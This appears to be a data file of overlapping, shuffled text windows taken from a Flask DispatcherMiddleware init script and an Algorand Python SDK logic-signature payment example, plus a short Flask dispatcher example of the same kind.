[ "run_simple from flask import Flask from api import app as api_app from frontend", "Flask from api import app as api_app from frontend import app as frontend_app", "application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME, PORT, application, use_reloader=USE_RELOADER,", "api import app as api_app from frontend import app as frontend_app from settings", "frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app})", "import app as api_app from frontend import app as frontend_app from settings import", "werkzeug.serving import run_simple from flask import Flask from api import app as api_app", "import DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask from api import", "import app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application =", "frontend import app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application", "USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME, PORT, application,", "HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__':", "app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app,", "PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME,", "from api import app as api_app from frontend import app as frontend_app from", "from werkzeug.serving import run_simple from flask import Flask from api import app as", "from frontend import app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER", "werkzeug.wsgi import DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask from api", "DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask from api import app", "as api_app from frontend import app as frontend_app from settings import HOSTNAME, PORT,", "api_app from frontend import app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER,", "from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if", "USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME, PORT,", "as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api':", "from werkzeug.wsgi import DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask from", "from flask import Flask from api import app as api_app from frontend import", "import run_simple from flask import Flask from api import app as api_app from", "app as api_app from frontend import app as frontend_app from settings import HOSTNAME,", "import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ ==", "import Flask from api import app as api_app from frontend import app as", "flask import Flask from api import app as api_app from frontend import app", "<filename>src/init.py from werkzeug.wsgi import DispatcherMiddleware from werkzeug.serving import run_simple 
from flask import Flask", "settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__", "= DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME, PORT, application, use_reloader=USE_RELOADER, use_debugger=USE_DEBUGGER)" ]
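# Added, self-contained variant (hypothetical names; the original wires in
# apps from the api, frontend and settings modules): two inline Flask apps
# mounted with DispatcherMiddleware, which newer Werkzeug releases expose
# from werkzeug.middleware.dispatcher rather than werkzeug.wsgi.
from flask import Flask
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from werkzeug.serving import run_simple

frontend = Flask("frontend")
api = Flask("api")

@frontend.route("/")
def index():
    return "frontend root"

@api.route("/ping")
def ping():
    return "pong"  # reachable at /api/ping once mounted

app = DispatcherMiddleware(frontend, {"/api": api})

if __name__ == "__main__":
    run_simple("localhost", 5000, app, use_reloader=True, use_debugger=True)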
[ "while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1", "# arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more info", "program requires an arg # if not, omit args param arg1 = (123).to_bytes(8,", "sender = lsig.address() # Get suggested parameters params = algod_client.suggested_params() # Comment out", "args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address()", "= open(myprogram, 'r').read() # Compile TEAL program # // This code is meant", "string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more", "\"\"\" Utility function to wait until the transaction is confirmed before proceeding. \"\"\"", "Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid)", "omit args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender =", "# see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL", "confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round", "receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract account LogicSig lstx =", "print(\"Response Hash = \", response['hash']) # Create logic sig programstr = response['result'] t", "proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round')", "= arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks", "10000 closeremainderto = None # Create a transaction txn = PaymentTxn( sender, params,", "learning purposes only # // It should not be used in production #", "Read TEAL program data = open(myprogram, 'r').read() # Compile TEAL program # //", "arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get", "# Read TEAL program data = open(myprogram, 'r').read() # Compile TEAL program #", "to wait until the transaction is confirmed before proceeding. 
\"\"\" last_round = client.status().get('last-round')", "8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response", "be used in production # // samplearg.teal # arg_0 # btoi # int", "<reponame>TheChronicMonster/docs from algosdk.v2client import algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64", "= PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract", "# Build transaction amount = 10000 closeremainderto = None # Create a transaction", "= LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters params = algod_client.suggested_params()", "Pushes: uint64 # // converts bytes X as big endian to uint64 #", "receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL", "last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0):", "LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until", "than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result'])", "LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") #", "client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: #", "is meant for learning purposes only # // It should not be used", "print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create", "= \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram", "= 10000 closeremainderto = None # Create a transaction txn = PaymentTxn( sender,", "print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed", "lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters params =", "# Compile TEAL program # // This code is meant for learning purposes", "True params.fee = 1000 # Build transaction amount = 10000 closeremainderto = None", "\"simple.stxn\") # Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \"", "0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {}", "LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters params = algod_client.suggested_params() #", "// btoi panics if the input is longer than 8 bytes response =", "client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round +=", "(123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters", "# int 123 # == # // bto1 # // Opcode: 0x17 #", "Build transaction amount = 10000 closeremainderto = None # Create a transaction txn", "= lsig.address() # Get suggested parameters params = 
algod_client.suggested_params() # Comment out the", "amount = 10000 closeremainderto = None # Create a transaction txn = PaymentTxn(", "\", response['hash']) # Create logic sig programstr = response['result'] t = programstr.encode() program", "suggested parameters params = algod_client.suggested_params() # Comment out the next two (2) lines", "TEAL program requires an arg # if not, omit args param arg1 =", "// Pushes: uint64 # // converts bytes X as big endian to uint64", "print(program) # string parameter # arg_str = \"<my string>\" # arg1 = arg_str.encode()", "= \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" #", "use suggested fees params.flat_fee = True params.fee = 1000 # Build transaction amount", "params = algod_client.suggested_params() # Comment out the next two (2) lines to use", "Pops: ... stack, []byte # // Pushes: uint64 # // converts bytes X", "uint64 # // converts bytes X as big endian to uint64 # //", "base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the transaction is", "LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid)", "client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return", "confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round')", "It should not be used in production # // samplearg.teal # arg_0 #", "This code is meant for learning purposes only # // It should not", "= algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash = \",", "pass if TEAL program requires an arg # if not, omit args param", "transaction is confirmed before proceeding. 
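# For reference, the samplearg.teal contract that the code below compiles, as
# reconstructed from the inline comments (treat it as an assumption about the
# file on disk): it approves the transaction only when the first argument,
# read as a big-endian integer, equals 123.
#
#     arg_0
#     btoi
#     int 123
#     ==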
\"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while", "algosdk.v2client import algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client,", "not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round)", "arg to pass if TEAL program requires an arg # if not, omit", "Create an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\"", "// converts bytes X as big endian to uint64 # // btoi panics", "transaction amount = 10000 closeremainderto = None # Create a transaction txn =", "see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program", "= client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting", "lsig = transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg", "for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in", "is longer than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result =", "algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except Exception as e: print(e)", "big endian to uint64 # // btoi panics if the input is longer", "import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the transaction", "= \", response['hash']) # Create logic sig programstr = response['result'] t = programstr.encode()", "LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid =", "in production # // samplearg.teal # arg_0 # btoi # int 123 #", "PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait", "# Create arg to pass if TEAL program requires an arg # if", "and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo =", "import algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid):", "to pass if TEAL program requires an arg # if not, omit args", "params.flat_fee = True params.fee = 1000 # Build transaction amount = 10000 closeremainderto", "lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx)", "# Comment out the next two (2) lines to use suggested fees params.flat_fee", "longer than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result = \",", "production # // samplearg.teal # arg_0 # btoi # int 123 # ==", "txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\")", "account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction", "# arg_str = \"<my 
string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program,", "converts bytes X as big endian to uint64 # // btoi panics if", "arg # if not, omit args param arg1 = (123).to_bytes(8, 'big') lsig =", "to uint64 # // btoi panics if the input is longer than 8", "# // Pushes: uint64 # // converts bytes X as big endian to", "programstr.encode() program = base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my string>\"", "uint64 # // btoi panics if the input is longer than 8 bytes", "Opcode: 0x17 # // Pops: ... stack, []byte # // Pushes: uint64 #", "= algod_client.suggested_params() # Comment out the next two (2) lines to use suggested", "programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) # string parameter", "an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client", "# lsig = transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create", "Hash = \", response['hash']) # Create logic sig programstr = response['result'] t =", "base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my string>\" # arg1 =", "(2) lines to use suggested fees params.flat_fee = True params.fee = 1000 #", "last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format(", "\"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') >", "btoi # int 123 # == # // bto1 # // Opcode: 0x17", "... stack, []byte # // Pushes: uint64 # // converts bytes X as", "= 1000 # Build transaction amount = 10000 closeremainderto = None # Create", "if TEAL program requires an arg # if not, omit args param arg1", "parameters params = algod_client.suggested_params() # Comment out the next two (2) lines to", "algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash = \", response['hash'])", "to use suggested fees params.flat_fee = True params.fee = 1000 # Build transaction", "stack, []byte # // Pushes: uint64 # // converts bytes X as big", "program = base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my string>\" #", "network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except Exception", "wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the transaction is confirmed before", "# btoi # int 123 # == # // bto1 # // Opcode:", "# Create a transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) #", "= algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except Exception as e:", "with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send", "# // samplearg.teal # arg_0 # btoi # int 123 # == #", "algod_client.suggested_params() # Comment out the next two (2) lines to use suggested fees", "// samplearg.teal # arg_0 # btoi # int 123 # == # //", "= programstr.encode() program = base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my", "\"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = 
\"samplearg.teal\" # Read TEAL program data", "response['result']) print(\"Response Hash = \", response['hash']) # Create logic sig programstr = response['result']", "txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except Exception as", "amount, closeremainderto) # Create the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn,", "next two (2) lines to use suggested fees params.flat_fee = True params.fee =", "// bto1 # // Opcode: 0x17 # // Pops: ... stack, []byte #", "params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract account LogicSig lstx", "panics if the input is longer than 8 bytes response = algod_client.compile(data) #", "Result = \", response['result']) print(\"Response Hash = \", response['hash']) # Create logic sig", "TEAL program data = open(myprogram, 'r').read() # Compile TEAL program # // This", "is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not", "raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client,", "def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the transaction is confirmed", "Create the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx],", "myprogram = \"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read() # Compile", "= response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) # string parameter #", "# arg_0 # btoi # int 123 # == # // bto1 #", "# // btoi panics if the input is longer than 8 bytes response", "= (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested", "until the transaction is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo =", "X as big endian to uint64 # // btoi panics if the input", "not, omit args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender", "Create arg to pass if TEAL program requires an arg # if not,", "wait until the transaction is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo", "= LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid", "== # // bto1 # // Opcode: 0x17 # // Pops: ... 
stack,", "LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to", "algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\"", "as big endian to uint64 # // btoi panics if the input is", "transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass", "args=[arg1]) sender = lsig.address() # Get suggested parameters params = algod_client.suggested_params() # Comment", "open(myprogram, 'r').read() # Compile TEAL program # // This code is meant for", "[]byte # // Pushes: uint64 # // converts bytes X as big endian", "\"<my string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see", "return txinfo try: # Create an algod client algod_token = \"<KEY>\" algod_address =", "'r').read() # Compile TEAL program # // This code is meant for learning", "= client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round", "None # Create a transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto)", "from algosdk.v2client import algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def", "closeremainderto = None # Create a transaction txn = PaymentTxn( sender, params, receiver,", "data = open(myprogram, 'r').read() # Compile TEAL program # // This code is", "two (2) lines to use suggested fees params.flat_fee = True params.fee = 1000", "an arg # if not, omit args param arg1 = (123).to_bytes(8, 'big') lsig", "(txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo", "algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read() #", "+= 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid,", "algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data = open(myprogram, 'r').read()", "Compile TEAL program # // This code is meant for learning purposes only", "params.fee = 1000 # Build transaction amount = 10000 closeremainderto = None #", "0x17 # // Pops: ... stack, []byte # // Pushes: uint64 # //", "the transaction is confirmed before proceeding. 
\"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid)", "arg_0 # btoi # int 123 # == # // bto1 # //", "the next two (2) lines to use suggested fees params.flat_fee = True params.fee", "fees params.flat_fee = True params.fee = 1000 # Build transaction amount = 10000", "> 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction", "meant for learning purposes only # // It should not be used in", "not be used in production # // samplearg.teal # arg_0 # btoi #", "# Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" +", "arg_str = \"<my string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1])", "= algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data = open(myprogram,", "from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility", "in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client", "code is meant for learning purposes only # // It should not be", "before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and", "sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract account LogicSig", "// This code is meant for learning purposes only # // It should", "# Get suggested parameters params = algod_client.suggested_params() # Comment out the next two", "string parameter # arg_str = \"<my string>\" # arg1 = arg_str.encode() # lsig", "the input is longer than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response", "# // It should not be used in production # // samplearg.teal #", "txid): \"\"\" Utility function to wait until the transaction is confirmed before proceeding.", "# // Opcode: 0x17 # // Pops: ... stack, []byte # // Pushes:", "# Create logic sig programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t)", "# // bto1 # // Opcode: 0x17 # // Pops: ... stack, []byte", "algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client =", "// Pops: ... stack, []byte # // Pushes: uint64 # // converts bytes", "bto1 # // Opcode: 0x17 # // Pops: ... 
stack, []byte # //", "confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod", "algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program data =", "Create a transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create", "program data = open(myprogram, 'r').read() # Compile TEAL program # // This code", "logic sig programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) #", "lines to use suggested fees params.flat_fee = True params.fee = 1000 # Build", "out the next two (2) lines to use suggested fees params.flat_fee = True", "more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program requires", "algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address)", "should not be used in production # // samplearg.teal # arg_0 # btoi", "try: # Create an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver", "btoi panics if the input is longer than 8 bytes response = algod_client.compile(data)", "here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program requires an arg", "# if not, omit args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program,", "Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash = \", response['hash']) # Create", "= \", response['result']) print(\"Response Hash = \", response['hash']) # Create logic sig programstr", "purposes only # // It should not be used in production # //", "parameter # arg_str = \"<my string>\" # arg1 = arg_str.encode() # lsig =", "# // converts bytes X as big endian to uint64 # // btoi", "txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client algod_token = \"<KEY>\"", "contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw", "round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client algod_token", "txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client algod_token = \"<KEY>\" algod_address", "= \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL program", "algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\"", "sig programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) # string", "\"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read", "args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if", "transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID:", "the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\")", "lstx = LogicSigTransaction(txn, lsig) # 
transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network", "requires an arg # if not, omit args param arg1 = (123).to_bytes(8, 'big')", "program # // This code is meant for learning purposes only # //", "Comment out the next two (2) lines to use suggested fees params.flat_fee =", "1000 # Build transaction amount = 10000 closeremainderto = None # Create a", "only # // It should not be used in production # // samplearg.teal", "# transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction", "t = programstr.encode() program = base64.decodebytes(t) print(program) # string parameter # arg_str =", "{} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an", "= \"<my string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) #", "1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round')))", "response = algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash =", "bytes X as big endian to uint64 # // btoi panics if the", "if the input is longer than 8 bytes response = algod_client.compile(data) # Print(response)", "# Create an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver =", "'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters params", "arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more info here:", "PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract account", "txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo", "import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to", "# == # // bto1 # // Opcode: 0x17 # // Pops: ...", "if not, omit args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1])", "param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() #", "txinfo try: # Create an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\"", "# // This code is meant for learning purposes only # // It", "{}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create an algod client algod_token =", "a transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the", "client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for", "Create logic sig programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program)", "123 # == # // bto1 # // Opcode: 0x17 # // Pops:", "info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program requires an", "txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with", "input is longer than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result", "\"samplearg.teal\" # Read TEAL program data = 
open(myprogram, 'r').read() # Compile TEAL program", "Utility function to wait until the transaction is confirmed before proceeding. \"\"\" last_round", "\"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram =", "for learning purposes only # // It should not be used in production", "transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction", "https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program requires an arg #", "\", response['result']) print(\"Response Hash = \", response['hash']) # Create logic sig programstr =", "samplearg.teal # arg_0 # btoi # int 123 # == # // bto1", "# Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash = \", response['hash']) #", "bytes response = algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash", "function to wait until the transaction is confirmed before proceeding. \"\"\" last_round =", "txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid)", "suggested fees params.flat_fee = True params.fee = 1000 # Build transaction amount =", "= True params.fee = 1000 # Build transaction amount = 10000 closeremainderto =", "# Create the LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) #", "to network txid = 